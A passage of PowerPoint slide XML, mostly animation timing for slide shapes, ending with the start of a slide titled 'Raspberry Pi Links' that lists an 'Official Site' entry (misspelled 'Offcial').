                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="151" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="152" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="153" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="154" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="155" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="156" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="157" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="158" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="159" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="160" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="136"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="161" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="136"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="162" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="163" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="164" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="165" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="166" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="167" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="168" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="169" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="170" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="171" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="172" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="173" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="174" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="175" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="176" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="177" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="178" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="179" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="180" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="181" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="152"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="182" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="152"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="183" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="184" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="185" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="186" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="187" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="188" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="189" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="190" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="191" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="192" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="193" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="194" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="195" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="196" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="197" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="198" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="199" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="200" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="201" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="202" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="203" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="204" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="205" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="206" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="207" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="208" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="209" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="210" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="211" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="212" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="213" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="214" presetID="42" presetClass="path" presetSubtype="0" repeatCount="indefinite" accel="50000" decel="50000" autoRev="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 2.77778E-7 2.22222E-6 L -0.32691 -0.17709 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="215" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-16354" y="-8866"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="sameClick" afterEffect="1">
                                          <p:stCondLst>
                                            <p:cond evt="end" delay="0">
                                              <p:tn val="214"/>
                                            </p:cond>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="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Raspberry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pi Links</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Offcial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Site </a:t>
